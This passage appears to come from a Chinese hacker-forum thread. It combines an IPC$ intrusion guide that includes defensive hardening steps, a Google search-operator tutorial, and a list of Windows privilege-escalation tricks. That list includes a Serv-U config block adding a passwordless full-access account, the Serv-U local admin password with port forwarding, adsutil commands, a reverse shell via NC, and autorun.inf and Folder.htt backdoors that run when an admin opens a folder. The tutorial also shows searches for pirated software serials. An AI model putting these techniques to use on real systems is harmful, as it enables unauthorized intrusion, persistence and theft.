你的lanmanworkstation服务未启动；目标删除了ipc$；  　　错误号1219，提供的凭据与已存在的凭据集冲突 ： 你已经和对方建立了一个ipc$，请删除再连。  　　错误号1326，未知的用户名或错误密码 ： 原因很明显了；  　　错误号1792，试图登录，但是网络登录服务没有启动 ： 目标NetLogon服务未启动。（连接域控会出现此情况）  　　错误号2242，此用户的密码已经过期 ： 目标有帐号策略，强制定期要求更改密码。  　　关于ipc$连不上的问题比较复杂，除了以上的原因,还会有其他一些不确定因素,在此本人无法详细而确定的说明,就靠大家自己体会和试验了. 　　如何打开目标的IPC$ 　　首先你需要获得一个不依赖于ipc$的shell，比如sql的cmd扩展、telnet、木马,当然，这shell必须是admin权限的,然后你可以使用shell执行命令 net share ipc$ 来开放目标的ipc$。从上面可以知道，ipc$能否使用还有很多条件。请确认相关服务都已运行，没有就启动它（不知道怎么做的请看net命令的用法）,还是不行的话（比如有防火墙，杀不了）建议放弃。  　　如何防范ipc$入侵 　　禁止空连接进行枚举(此操作并不能阻止空连接的建立,引自《解剖win2000下的空会话》) 　　首先运行regedit，找到如下组建[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA]把RestrictAnonymous = DWORD的键值改为：00000001(如果设置为2的话,有一些问题会发生,比如一些WIN的服务出现问题等等) 　　禁止默认共享1）察看本地共享资源运行-cmd-输入net share 　　2）删除共享(每次输入一个） 　　　　net share ipc$ /delete 　　　　net share admin$ /delete 　　　　net share c$ /delete 　　　　net share d$ /delete（如果有e,f,……可以继续删除） 　　3）停止server服务 　　　　net stop server /y （重新启动后server服务会重新开启） 　　4）修改注册表 　　运行-regedit 　　server版:找到如下主键[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters]把AutoShareServer（DWORD）的键值改为:00000000。  　　pro版:找到如下主键[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters]把AutoShareWks（DWORD）的键值改为:00000000。  　　如果上面所说的主键不存在，就新建(右击-新建-双字节值）一个主健再改键值。  　　永久关闭ipc$和默认共享依赖的服务:lanmanserver即server服务 　　控制面板-管理工具-服务-找到server服务（右击）-属性-常规-启动类型-已禁用 　　安装防火墙(选中相关设置)，或者端口过滤(滤掉139,445等),或者用新版本的优化大师 　　设置复杂密码，防止通过ipc$穷举密码 问： 请问下~IPC空连接~有什么用啊？请问下~IPC空连接~有什么用啊？ 这么才可以取得更高的权利呢？？  答：首先需要指出的是空连接和ipc$是不同的概念。空连接是在没有信任的情况下与服务器建立的会话，换句话说，它是一个到服务器的匿名访问。ipc$是为了让进程间通信而开放的命名管道，可以通过验证用户名和密码获得相应的权限。有许多的工具必须用到ipc$。默认共享是为了方便远程管理而开放的共享，包含了所有的逻辑盘（c$,d$,e$……）和系统目录winnt或windows（admin$）。  IPC$(Internet Process Connection)是共享"命名管道"的资源，它是为了让进程间通信而开放的命名管道，可以通过验证用户名和密码获得相应的权限,在远程管理计算机和查看计算机的共享资源时使用。利用IPC$,连接者甚至可以与目标主机建立一个空的连接而无需用户名与密码(当然,对方机器必须开了ipc$共享,否则你是连接不上的)，而利用这个空的连接，连接者还可以得到目标主机上的用户列表(不过负责的管理员会禁止导出用户列表的)。我们总在说ipc$漏洞ipc$漏洞,其实,ipc$并不是真正意义上的漏洞,它是为了方便管理员的远程管理而开放的远程网络登陆功能,而且还打开了默认共享,即所有的逻辑盘(c$,d$,e$……)和系统目录winnt或windows(admin$)。所有的这些,初衷都是为了方便管理员的管理,但好的初衷并不一定有好的收效,一些别有用心者(到底是什么用心?我也不知道,代词一个)会利用IPC$，访问共享资源,导出用户列表,并使用一些字典工具，进行密码探测,寄希望于获得更高的权限,从而达到不可告人的目的. 　　解惑: 　　1)IPC连接是Windows NT及以上系统中特有的远程网络登陆功能，其功能相当于Unix中的Telnet,由于IPC$功能需要用到Windows NT中的很多DLL函数，所以不能在Windows 9.x中运行。也就是说只有nt/2000/xp才可以建立ipc$连接,98/me是不能建立ipc$连接的(但有些朋友说在98下能建立空的连接,不知道是真是假,不过现在都2003年了,建议98的同志换一下系统吧,98不爽的) 　　2)即使是空连接也不是100%都能建立成功,如果对方关闭了ipc$共享,你仍然无法建立连接 　　3)并不是说建立了ipc$连接就可以查看对方的用户列表,因为管理员可以禁止导出用户列表 　　建立ipc$连接在hack攻击中的作用 　　就像上面所说的,即使你建立了一个空的连接,你也可以获得不少的信息(而这些信息往往是入侵中必不可少的),访问部分共享,如果你能够以某一个具有一定权限的用户身份登陆的话,那么你就会得到相应的权限,显然,如果你以管理员身份登陆,嘿嘿,就不用我在多说了吧,what u want,u can do!! 　　(基本上可以总结为获取目标信息、管理目标进程和服务,上传木马并运行,如果是2000server，还可以考虑开启终端服务方便控制.怎么样?够厉害吧!) 　　不过你也不要高兴的太早,因为管理员的密码不是那么好搞到的,虽然会有一些傻傻的管理员用空口令或者弱智密码,但这毕竟是少数,而且现在不比从前了,随着人们安全意识的提高,管理员们也愈加小心了,得到管理员密码会越来越难的   　　因此今后你最大的可能就是以极小的权限甚至是没有权限进行连接,你会慢慢的发现ipc$连接并不是万能的,甚至在主机不开启ipc$共享时,你根本就无法连接. 　　所以我认为,你不要把ipc$入侵当作终极武器,不要认为它战无不胜,它就像是足球场上射门前的传球,很少会有致命一击的效果,但却是不可缺少的,我觉得这才是ipc$连接在hack入侵中的意义所在. Re:[攻册]黑客高手必懂基础内容 GOOGLE搜索秘籍 一，GOOGLE简介  Google（ www.google.com）是一个搜索引擎，由两个斯坦福大学博士生Larry Page与Sergey Brin于1998年9月发明，Google Inc. 于1999年创立。2000年7月份，Google替代Inktomi成为Yahoo公司的搜索引擎，同年9月份，Google成为中国网易公司的搜索引擎。98年至今，GOOGLE已经获得30多项业界大奖。  二，GOOGLE特色  GOOGLE支持多达132种语言，包括简体中文和繁体中文；  GOOGLE网站只提供搜索引擎功能，没有花里胡哨的累赘；  GOOGLE速度极快，据说有8000多台服务器，200多条T3级宽带；  GOOGLE的专利网页级别技术PageRank能够提供高命中率的搜索结果；  GOOGLE的搜索结果摘录查询网页的部分具体内容，而不仅仅是网站简介；  GOOGLE智能化的“手气不错”功能，提供可能最符合要求的网站；  GOOGLE的“网页快照”功能，能从GOOGLE服务器里直接取出缓存的网页。  三，基本搜索： ，-，OR  GOOGLE无需用明文的“ ”来表示逻辑“与”操作，只要空格就可以了。  示例：搜索所有包含关键词“易筋经”和“吸星大法”的中文网页  搜索：“易筋经 吸星大法”  结果：已搜索有关易筋经 吸星大法的中文(简体)网页。共约有726项查询结果，这是第1-10项。搜索用时0.13秒。  注意：文章中搜索语法外面的引号仅起引用作用，不能带入搜索栏内。  GOOGLE用减号“-”表示逻辑“非”操作。  示例：搜索所有包含“易筋经”而不含“吸星大法”的中文网页  搜索：“易筋经 -吸星大法”  结果：已搜索有关易筋经 -吸星大法的中文(简体)网页。共约有5,440项查询结果，这是第1-10项。搜索用时0.13秒。  注意：这里的“ ”和“-”号，是英文字符，而不是中文字符的“＋”和“－”。此外，操作符与作用的关键字之间，不能有空格。比如“易筋经 - 吸星大法”，搜索引擎将视为逻辑“与”操作，中间的“-”被忽略。  GOOGLE用大写的“OR”表示逻辑“或”操作。但是，关键字为中文的或查询似乎还有BUG，无法得到正确的查询结果。  示例：搜索包含布兰妮“Britney”或者披头士“Beatles”、或者两者均有的中文网页。  搜索：“britney OR beatles”  结果：已搜索有关britney OR beatles的中文(简体)网页。共约有14,600项查询结果，这是第1-10项。搜索用时0.08秒。  搜索：“布兰妮 OR 披头士”  结果：找不到和您的查询-布兰妮 OR 披头士-相符的网页。  注意：小写的“or”，在查询的时候将被忽略；这样上述的操作实际上变成了一次“与”查询。  “ ”和“-”的作用有的时候是相同的，都是为了缩小搜索结果的范围，提高查询结果命中率。  例：查阅天龙八部具体是哪八部。  分析：如果光用“天龙八部”做关键字，搜索结果有26,500项，而且排前列的主要与金庸的小说《天龙八部》相关，很难找到所需要的资讯。可以用两个方法减少无关结果。  1，如果你知道八部中的某一部，比如阿修罗，增加“阿修罗”关键字，搜索结果就只有995项，可以直接找到全部八部，“天龙八部 阿修罗”。  2，如果你不知道八部中的任何一部，但知道这与佛教相关，可以排除与金庸小说相关的记录，查询结果为1,010项，可以迅速找到需要的资料，“天龙八部 佛教 -金庸”。  四，辅助搜索：通配符、大小写、句子、忽略字符以及强制搜索  GOOGLE不支持通配符，如“*”、“?”等，只能做精确查询，关键字后面的“*”或者“?”会被忽略掉。  GOOGLE对英文字符大小写不敏感，“GOD”和“god”搜索的结果是一样的。  GOOGLE的关键字可以是词组（中间没有空格），也可以是句子（中间有空格），但是，用句子做关键字，必须加英文引号。  示例：搜索包含“long, long ago”字串的页面。  搜索：“"long, long ago"”  结果：已向英特网搜索"long, long ago". 共约有28,300项查询结果，这是第1-10项。搜索用时0.28秒。  注意：和搜索英文关键字串不同的是，GOOGLE对中文字串的处理并不十分完善。比如，搜索“"啊，我的太阳"”，我们希望结果中含有这个句子，事实并非如此。查询的很多结果，“啊”、“我的”、“太阳”等词语是完全分开的，但又不是“啊 我的 太阳”这样的与查询。显然，GOOGLE对中文的支持尚有欠缺之处。  GOOGLE对一些网路上出现频率极高的词（主要是英文单词），如“i”、“com”，以及一些符号如“*”、“.”等，作忽略处理，如果用户必须要求关键字中包含这些常用词，就要用强制语法“ ”。  示例：搜索包含“Who am I ?”的网页。如果用“"who am i ?"”，“Who”、“I”、“?”会被省略掉，搜索将只用“am”作关键字，所以应该用强制搜索。  搜索：“" who am i"”  结果：已向英特网搜索" who am i". 共约有362,000项查询结果，这是第1-10项。搜索用时0.30秒。  注意：英文符号（如问号，句号，逗号等）无法成为搜索关键字，加强制也不行。  五，高级搜索：site，link，inurl，allinurl，intitle，allintitle  “site”表示搜索结果局限于某个具体网站或者网站频道，如“sina.com.cn”、“edu.sina.com.cn”，或者是某个域名，如“com.cn”、“com”等等。如果是要排除某网站或者域名范围内的页面，只需用“-网站/域名”。  示例：搜索中文教育科研网站（edu.cn）上所有包含“金庸”的页面。  搜索：“金庸 site:edu.cn”  结果：已搜索有关金庸 site:edu.cn的中文(简体)网页。共约有2,680项查询结果，这是第1-10项 。搜索用时0.31秒。  示例：搜索包含“金庸”和“古龙”的中文新浪网站页面，  搜索：“金庸 古龙 site:sina.com.cn”  结果：已在sina.com.cn搜索有关金庸 古龙的中文(简体)网页。共约有869项查询结果，这是第1-10项。搜索用时0.34秒。  注意：site后的冒号为英文字符，而且，冒号后不能有空格，否则，“site:”将被作为一个搜索的关键字。此外，网站域名不能有“http”以及“www”前缀，也不能有任何“/”的目录后缀；网站频道则只局限于“频道名.域名”方式，而不能是“域名/频道名”方式。诸如“金庸 site:edu.sina.com.cn/1/”的语法是错误的。  “link”语法返回所有链接到某个URL地址的网页。  示例：搜索所有含指向华军软件园“ www.newhua.com”链接的网页。  搜索：“link: www.newhua.com”  结果：搜索有链接到 www.newhua.com的网页。共约有695项查询结果，这是第1-10项。搜索用时0.23秒。  注意：“link”不能与其他语法相混合操作，所以“link:”后面即使有空格，也将被GOOGLE忽略。  inurl语法返回的网页链接中包含第一个关键字，后面的关键字则出现在链接中或者网页文档中。有很多网站把某一类具有相同属性的资源名称显示在目录名称或者网页名称中，比如“MP3”、“GALLARY”等，于是，就可以用INURL语法找到这些相关资源链接，然后，用第二个关键词确定是否有某项具体资料。INURL语法和基本搜索语法的最大区别在于，前者通常能提供非常精确的专题资料。  示例：查找MIDI曲“沧海一声笑”。  搜索：“inurl:midi 沧海一声笑”  结果：已搜索有关inurl:midi 沧海一声笑的中文(简体)网页。共约有14项查询结果，这是第1-10项。搜索用时0.01秒。  示例：查找微软网站上关于windows2000的安全课题资料。  搜索：“inurl:security windows2000 site:microsoft.com”  结果：已在microsoft.com内搜索有关 inurl:security windows2000的网页。共约有198项查询结果，这是第1-10项。搜索用时0.37秒。  注意：“inurl:”后面不能有空格，GOOGLE也不对URL符号如“/”进行搜索。GOOGLE对“cgi-bin/phf”中的“/”当成空格处理。  allinurl语法返回的网页的链接中包含所有查询关键字。这个查询的对象只集中于网页的链接字符串。  示例：查找可能具有PHF安全漏洞的公司网站。通常这些网站的CGI-BIN目录中含有PHF脚本程序（这个脚本是不安全的），表现在链接中就是“域名/cgi-bin/phf”。  语法：“allinurl:"cgi-bin" phf com”  搜索：已向英特网搜索allinurl:"cgi-bin" phf com. 共约有40项查询结果，这是第1-10项。搜索用时0.06秒。  allintitle和intitle的用法类似于上面的allinurl和inurl，只是后者对URL进行查询，而前者对网页的标题栏进行查询。网页标题，就是HTML标记语言title中之间的部分。网页设计的一个原则就是要把主页的关键内容用简洁的语言表示在网页标题中。因此，只查询标题栏，通常也可以找到高相关率的专题页面。  示例：查找日本明星藤原纪香的照片集。  搜索：“intitle:藤原纪香 写真”  结果：已搜索有关intitle:藤原纪香 写真的中文(简体)网页。共约有284项查询结果，这是第1-10项。搜索用时0.03秒。  GOOGLE的罕用高级搜索语法：related，cache，info  related用来搜索结构内容方面相似的网页。例：搜索所有与中文新浪网主页相似的页面（如网易首页，搜狐首页，中华网首页等），“related: www.sina.com.cn/index.shtml”。  cache用来搜索GOOGLE服务器上某页面的缓存，这个功能同“网页快照”，通常用于查找某些已经被删除的死链接网页，相当于使用普通搜索结果页面中的“网页快照”功能。  info用来显示与某链接相关的一系列搜索，提供cache、link、related和完全包含该链接的网页的功能。  示例：查找和新浪首页相关的一些资讯。  搜索：“info: www.sina.com.cn”  结果：有关 www.sina.com.cn的网页信息。  新浪首页  北京站 上海站 广东站. ... 游戏世界, |, 影音娱乐, |, Club缘, |, 男  人女人, |, 论坛聊天, |, 时尚潮流, |, 文教育儿, |, 车行天下, |,  软件下载. ...  Google 提供这个网址的信息:  查看Google网页快照里 www.sina.com.cn的存档  寻找和 www.sina.com.cn类似的网页  寻找网页有链接到 www.sina.com.cn  寻找网页包含有'www.sina.com.cn'  六，其他重要功能  目录服务  如果不想搜索网页，而是想寻找某些专题网站，可以访问GOOGLE的分类目录“ http://directory.google.com/”，中文目录是“ http://directory.google.com/Top/World/Chinese_Simplified/”。不过由于GOOGLE的目录由志愿者服务，而GOOGLE在国内名气相对比较小，因此中文目录下收录站点很少。  工具条  为了方便搜索者，GOOGLE提供了工具条，集成于浏览器中，用户无需打开GOOGLE主页就可以在工具条内输入关键字进行搜索。此外，工具条还提供了其他许多功能，如显示页面PageRank等。最方便的一点在于用户可以快捷的在GOOGLE主页、目录服务、新闻组搜索、高级搜索和搜索设定之间切换。欲安装GOOGLE的工具条，可以访问“ http://toolbar.google.com/”，按页面提示可以自动下载并安装。  新闻组（USENET）搜索  新闻组中有大量的有价值信息，DEJA一直是新闻组搜索引擎中的佼佼者。2001年2月份，GOOGLE将DEJA收购并提供了所有DEJA的功能。现在，除了搜索之外，GOOGLE还支持新闻组的WEB方式浏览和张贴功能。  输入“ http://groups.google.com/”后，便进入GOOGLE新闻组界面。可惜现在还没有中文界面。因为新闻组中的帖子实在是多，所以我点击“Advaced Groups Search”进入高级搜索界面 http://groups.google.com/advanced_group_search。新闻组高级搜索界面提供对关键字、新闻组、主题、作者、帖子序号、语言和发布日期的条件搜索。其中作者项指作者发帖所用的唯一识别号电子信箱。比如要在alt.chinese.text内搜索著名老牌网络写手图雅的帖子，可以用下列指令“group:alt.chinese.text author:tuya@ccmail.uoregon.edu”。不过一般而言，我更推荐使用图形搜索界面，方便而且直观。  搜索结果翻译  曾经为那些你不懂的法文、西班牙文页面烦恼么？现在，GOOGLE支持一项搜索结果翻译功能，可以把非英文的搜索结果翻译成英文！！虽然目前只支持有限的拉丁语、法语、西班牙语、德语和葡萄牙文，但是我不得不承认，这是个伟大的改进。  不过，目前只能在英文状态GOOGLE下实现这个功能。进入GOOGLE的设置页面， http://www.google.com/preferences，有一个“BETA: Enable translation of search results into your interface language. ”的选项，把它选中，就OK了。  搜索结果过滤  网络上的成人内容浩如烟海，而且很多站点具有欺骗或者其他不良企图，浏览者很容易掉入其中的陷阱。为此，GOOGLE新设立了成人内容过滤功能，见GOOGLE的设置页面， http://www.google.com/preferences，最底下有一个选项SafeSearch Filtering。不过，中文状态下的GOOGLE尚没有这个功能。  PDF文档搜索  我对GOOGLE尤其欣赏的一点就是它提供对PDF文档内文的检索。目前GOOGLE检索的PDF文档大约有2500万左右。这真是太美妙了。PDF是ADOBE公司开发的电子文档格式，现在已经成为互联网的电子化出版标准。PDF文档通常是一些图文并茂的综合性文档，提供的资讯一般比较集中全面。  示例：搜索关于电子商务（ECOMMERCE）的PDF文档。  搜索：“inurl:pdf ecommerce”  结果：已向英特网搜索inurl:pdf ecommerce. 共约有19,200项查询结果，这是第1-10项。搜索用时0.11秒。  下面是某项搜索结果：  [PDF]  www.usi.net/pdf/outsoucing-ecommerce.pdf  Outsourcing Electronic Commerce Business Case White Paper By: John P. Sahlin, Product  Marketing Professonial (PMP) Implementation Manager, Web Engineering ...  一般文字档 - 类似网页  可以看到，GOOGLE在PDF档前加上了[PDF]的标记，而且，GOOGLE把PDF文件转换成了文字档，点击“一般文字档”，可以粗略的查看该PDF文档的大致内容。当然，PDF原有的图片以及格式是没有了。  图像文档搜索  GOOGLE提供了Internet上图像文件的搜索功能！！目前该功能尚在B测试阶段，但已经非常好用。访问地址是“images.google.com”。你可以在关键字栏位内输入描述图像内容的关键字，如“britney spears”，也可以输入描述图像质量或者其他属性的关键字，如“high quality”。  GOOGLE给出的搜索结果具有一个直观的缩略图（THUMBNAIL），以及对该缩略图的简单描述，如图像文件名称，以及大小等。点击缩略图，页面分成两祯，上祯是图像之缩略图，以及页面链接，而下祯，则是该图像所处的页面。屏幕右上角有一个“Remove Frame”的按钮，可以把框架页面迅速切换到单祯的结果页面，非常方便。GOOGLE还提供了对成人内容图像的限制功能，可以让搜索者免受不必要的骚扰。  不过，非常遗憾的是，图像搜索功能还不支持中文。  七，搜索技巧杂谈  关键词的选择在搜索中起到决定性的作用，所有搜索技巧中，关键词选择是最基本也是最有效的。  例一：查找《镜花缘》一书中淑士国酒保的酸话原文。  分析：如果按照一般的思路，找某部小说中的具体段落，就需要用搜索引擎先找到这本书，然后再翻到该段落。这样做当然可以，但是效率很低。如果了解目标信息的构成，用一些目标信息所特有的字词，可以非常迅速的查到所需要的资料。也就是说，高效率的搜索关键字不一定就是目标信息的主题。在上面的例子中，酒保谈到酒的浓淡与贵贱的关系时，之乎者也横飞。因此，可以用特定的词语一下子找到目标资料。  搜索：“酒 贵 贱 之”，OK，找到的第一条信息就是镜花缘的这一段落：“先生听者：今以酒醋论之，酒价贱之，醋价贵之。因何贱之？为甚贵之？真所分之，在其味之。酒昧淡之，故而贱之；醋味厚之，所以贵之。...”  以上的关键字选择技巧可以谓之“特定词法”。  例二：“黄花闺女”一词中“黄花”是什么意思。  分析：“黄花闺女”是一个约定的俗语，如果只用“黄花闺女 黄花”做关键词，搜索结果将浩如烟海，没什么价值，因此必须要加更多的关键词，约束搜索结果。选择什么关键词好呢？备选的有“意思”、“含义”、“来历”、“由来”、“典故”、“出典”、“渊源”等，可以猜到的是，类似的资料，应该包含在一些民俗介绍性的文字里，所以用诸如“来历”、“由来”、“出典”等词汇的概率更高一些。  搜索：“黄花闺女 黄花 由来”，查到“黄花”原来出典于《太平御览》，与南朝的寿阳公主相关。如果想获得第一手资料，那就可以用“太平御览 寿阳公主”做搜索了。  以上的关键字选择技巧可以谓之“近义词法”。  例三：刘德华同志的胸围是多少。  分析：首先声明，这是某个MM要我做的搜索，我把它作为搜索案例而已，没其他的意思。非常直接的搜索是，“刘德华 胸围”，但事实上，这么搜索出来的结果，尽是一些诸如“刘德华取笑莫文蔚胸围太小”之类的八卦新闻，无法快速得到所需要的资料。可以想到的是，需要的资料应该包含在刘德华的全面介绍性文字中，除了胸围，应该还包括他的身高，体重，生日等一系列相关信息。OK，这样就可以进一步的增加其他约束性关键词以缩小搜索范围。  搜索：“刘德华 胸围 身高”，没有料到的情况发生了，网上炙手可热的痞子蔡《第一次亲密接触》里居然含有这样关键字，阿泰“改编自刘德华《忘情水》的变态歪歌”、“用身高体重三围和生日来加以编号”。好办，把这部小说去掉，“刘德华 胸围 身高 -阿泰”，OK，结果出来了，华仔胸围84cm。说明一下，为什么用“阿泰”而不用“第一次亲密接触”呢？这是因为小说的名字被转载的时候可能有变动，但里面角色的名字是不会变的。  以上的关键字选择技巧可以谓之“相关词法”。  其他常用搜索个案  例一：找人  分析：一个人在网上揭示的资料通常有：姓名，网名，性别，年龄，毕业学校，工作单位，外号，住址，电话，信箱，BP，手机号码，ICQ号，OICQ号等等。所以，如果你要了解一下你多年没见过的同学，那不妨用上述信息做关键字进行查询，也许会有大的收获。  例二：找软件  分析一：最简单的搜索当然就是直接以软件名称以及版本号为关键字查询。但是，仅仅有软件名称和目标网站，显然还不行，因为搜索到的可能是软件的相关新闻。应该再增加一个关键字。考虑到下载页面上常有“点击此处下载”或者“download”的提示语，因此，可以增加“下载”或者“download”为关键字。  搜索：“winzip 8.0 下载”  结果：已搜索有关winzip 8.0 下载的中文(简体)网页。共约有6,670项查询结果，这是第1-10项。搜索用时0.22秒。  分析二：很多网站设有专门的下载目录，而且就命名为“download”，因此，可以用INURL语法直接搜索这些下载目录。  搜索：“winzip 8.0 inurl:download”  结果：已搜索有关winzip 8.0 inurl:download的中文(简体)网页。共约有358项查询结果，这是第1-10项。搜索用时0.44秒。  在互联网上随意的下载软件是不安全的，因为供下载的软件有可能带有病毒或者捆绑了木马，所以，对下载网站作一个限定，是一个稳妥的思路。可以用SITE语法达到这个目的。  共享软件下载完之后，使用的时候，软件总跳出警示框，或者软件的功能受到一定限制。由于中国的网民多是穷棒子，所以应该再找一个注册码。找注册码，除了软件的名称和版本号外，还需要有诸如“serial number”、“sn”、“序列号”等关键字。现在，来搜索一下winzip8.0的注册码。  搜索：“winzip 8.0 sn”  结果：已向英特网搜索winzip 8.0 sn. 共约有777项查询结果，这是第1-10项。搜索用时0.30秒。  例三：找图片  除了GOOGLE提供的专门图片搜索功能，还可以组合使用一些搜索语法，达到图片搜索之目的。  分析一：专门的图片集合，提供图片的网站通常会把图片放在某个专门目录下，如“gallary”、“album”、“photo”、“image”等。这样就可以使用INURL语法迅速找到这类目录。现在，试着找找小甜甜布兰妮的照片集。  搜索：“"britney spears" inurl:photo”  结果：已向英特网搜索"britney spears" inurl:photo. 共约有2,720项查询结果，这是第1-10项。搜索用时0.23秒。  分析二：提供图片集合的网页，在标题栏内通常会注明，这是谁谁的图片集合。于是就可以用INTITLE语法找到这类网页。  搜索：“intitle:"britney spears" picture”  结果：已向英特网搜索intitle:"britney spears" picture. 共约有317项查询结果，这是第1-10项。搜索用时0.40秒。  分析三：明星的FANS通常会申请免费个人主页来存放他们偶像的靓照。于是用SITE语法指定某免费主页提供站点，是个迅速找到图片的好办法。  搜索：“"britney spears" site:geocities.com”  结果：已在geocities.com内搜索有关"britney spears"的网页。共约有5,020项查询结果，这是第1-10项。搜索用时0.47秒。  例四：找MP3  分析一：提供MP3的网站，通常会建立一个叫做MP3的目录，目录底下分门别类的存放各种MP3乐曲。所以，可以用INURL语法迅速找到这类目录。现在用这个办法找找老歌“say you say me”。  搜索：“"say you say me" inurl:mp3”  结果：已向英特网搜索inurl:mp3 "say you say me". 共约有155项查询结果，这是第1-10项。搜索用时0.17秒。  分析二：也可以通过网页标题，找到这类提供MP3的网页。  搜索：“"say you say me" intitle:mp3”  结果：已向英特网搜索"say you say me" intitle:mp3. 共约有178项查询结果，这是第1-10项。搜索用时0.73秒。  当然，如果你知道某个网站的下载速度快，而且乐曲全，就可以用SITE语法先到该网站上看看有没有目标乐曲。  例五：找书  分析一：对我而言，常访问的电子图书馆类网站就那么几个，比如文艺类的“ www.shuku.net”。于是可以用SITE语法很简单的找到某本书（如果该网站上有的话）。比如，“旧唐书 site:shuku.net”，就可以马上找到该书。如果没有，通常别的网站上也很难找到。因此，找书的关键，是你了解一大批著名的图书馆网站。  分析二：我上面介绍的第一项关键字选择技巧特定词法，对于迅速找到某书或者文章也是极其有用的，当然，这得建立在你已经读过该书，对书的内容有印象的基础上。比如如果了解堂吉诃德一书战风车的大致内容，就可以用“吉诃德 风车 桑乔”迅速找到该书。  九，GOOGLE搜索FAQ  Q：如何全面的了解google.com？  A：查看网站相关页面“ http://www.google.com/about.html”。  Q：如何切换google.com的初始语言界面？  A：点击搜索栏右边的“使用偏好”（Preferences），选择“界面语言”（Interface Language）中你期望的语言，点击最下面的“设定使用偏好”（Save Preferences）按钮。需要提醒的是，GOOGLE用cookie记录这个偏好，所以如果你把浏览器的cookie功能关掉，就无法进行设定。  Q：如何设定每页搜索结果显示数量？  A：同上，进入使用偏好，在该页的“查看结果”（Number of Results）选择显示结果数，数目越大，显示结果需要的时间越长，默认是10项。  Q：搜索到的链接无法打开怎么办？  A：链接无法打开的原因很多，比如网站当机，或者ISP过滤等，可以点击GOOGLE的“网页快照”查看在GOOGLE服务器上的网页缓存。 Q：打开搜索结果的链接，可是该页面太大，很难找到一下子找到目的资料怎么办？  A：直接打开“网页快照”，GOOGLE会把关键词用不同颜色标记出来，很容易找到。 Re:[攻册]黑客高手必懂基础内容 21种RING的提权方法 好多都没有成功，还是发来看看，看看思路，呵呵 以下全部是本人提权时候的总结 很多方法至今没有机会试验也没有成功，但是我是的确看见别人成功过的。本人不才，除了第一种方法自己研究的，其他的都是别人的经验总结。希望对朋友有帮助！ 1.radmin连接法   条件是你权限够大，对方连防火墙也没有。封装个radmin上去，运行，开对方端口，然后radmin上去。本人从来米成功过。，端口到是给对方打开了。 2.paanywhere   C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\ 这里下他的GIF文件，在本地安装pcanywhere上去 3.SAM破解   C:\WINNT\system32\config\ 下他的SAM 破解之 4.SU密码夺取   C:\Documents and Settings\All Users\「开始」菜单\程序\    引用：Serv-U，然后本地查看属性，知道路径后，看能否跳转        进去后，如果有权限修改ServUDaemon.ini，加个用户上去，密码为空  [USER=WekweN|1]  Password=  HomeDir=c:\  TimeOut=600  Maintenance=System  Access1=C:\|RWAMELCDP  Access1=d:\|RWAMELCDP  Access1=f:\|RWAMELCDP  SKEYValues=        这个用户具有最高权限，然后我们就可以ftp上去 quote site exec xxx 来提升权限 5.c:\winnt\system32\inetsrv\data\    引用：就是这个目录，同样是erveryone 完全控制，我们所要做的就是把提升权限的工具上传上去，然后执行  6.SU溢出提权   这个网上教程N多 不详细讲解了 7.运行Csript   引用：运行"c script  C:\Inetpub\Admin script s\adsutil.vbs get w3svc/inprocessisapiapps"来提升权限  用这个c script  C:\Inetpub\Admin script s\adsutil.vbs get w3svc/inprocessisapiapps  查看有特权的dll文件：idq.dll httpext.dll httpodbc.dll ssinc.dll msw3prt.dll  再将asp.dll加入特权一族  asp.dll是放在c:\winnt\system32\inetsrv\asp.dll (不同的机子放的位置不一定一样)  我们现在加进去c script  adsutil.vbs set /W3SVC/InProcessIsapiApps "C:\WINNT\system32\idq.dll" "C:\WINNT\system32\inetsrv\httpext.dll" "C:\WINNT\system32\inetsrv\httpodbc.dll" "C:\WINNT\system32\inetsrv\ssinc.dll" "C:\WINNT\system32\msw3prt.dll""c:\winnt\system32\inetsrv\asp.dll"  可以用c script  adsutil.vbs get /W3SVC/InProcessIsapiApps 来查看是不是加进去了  8.脚本提权   c:\Documents and Settings\All Users\「开始」菜单\程序\启动"写入bat，vbs 9.VNC   这个是小花的文章 HOHO    默认情况下VNC密码存放在HKCU\Software\ORL\WinVNC3\Password   我们可以用vncx4   破解它，vncx4使用很简单，只要在命令行下输入   c:\>vncx4 -W   然后顺序输入上面的每一个十六进制数据，没输完一个回车一次就行了。 10.NC提权   给对方来个NC 但是条件是你要有足够的运行权限 然后把它反弹到自己的电脑上 HOHO OK了 11.社会工程学之GUEST提权   很简单 查看他的拥护 一般来说 看到帐户以后 密码尽量猜 可能用户密码一样 也可能是他QQ号 邮箱号 手机号 尽量看看 HOHO 12.IPC空连接   如果对方真比较白痴的话 扫他的IPC 如果运气好还是弱口令 13.替换服务   这个不用说了吧？个人感觉相当复杂 14.autorun .inf   autorun=xxx.exe 这个=后面自己写 HOHO 加上只读、系统、隐藏属性 传到哪个盘都可以的 不相信他不运行 15.desktop.ini与Folder.htt   引用：首先，我们现在本地建立一个文件夹，名字不重要，进入它，在空白处点右键，选择“自定义文件夹”（xp好像是不行的）一直下点，默认即可。完成后，你就会看到在此目录下多了两个名为Folder setting的文件架与desktop.ini的文件，（如果你看不到，先取消“隐藏受保护的操作系统文件”）然后我们在Folder setting目录下找到Folder.htt文件，记事本打开，在任意地方加入以下代码： <OBJECT ID=”RUNIT” WIDTH=0 HEIGHT=0 TYPE=”application/x-oleobject” CODEBASE=”你的后门文件名”> </OBJECT> 然后你将你的后门文件放在Folder setting目录下，把此目录与desktop.ini一起上传到对方任意一个目录下，就可以了，只要等管理员浏览了此目录，它就执行了我们的后门 16.su覆盖提权   本地安装个su，将你自己的ServUDaemon.ini文件用从他那下载下来的ServUDaemon.ini 覆盖掉，重起一下Serv-U，于是你上面的所有配置都与他的一模一样了 17.SU转发端口   43958这个是 Serv －U 的本地管理端口。FPIPE.exe上传他，执行命令： Fpipe –v –l 3333 –r 43958 127.0.0.1 意思是将3333端口映射到43958端口上。 然后就可以在本地安装一个Serv-u，新建一个服务器，IP填对方IP，帐号为LocalAdministrator 密码为#1@$ak#.1k;0@p 连接上后你就可以管理他的Serv-u了 18.SQL帐户密码泄露   如果对方开了MSSQL服务器，我们就可以通过用SQL连接器加管理员帐号（可以从他的连接数据库的ASP文件中看到），因为MSSQL是默认的SYSTEM权限。   引用：对方没有删除xp_cmdshell 方法：使用Sqlexec.exe，在host 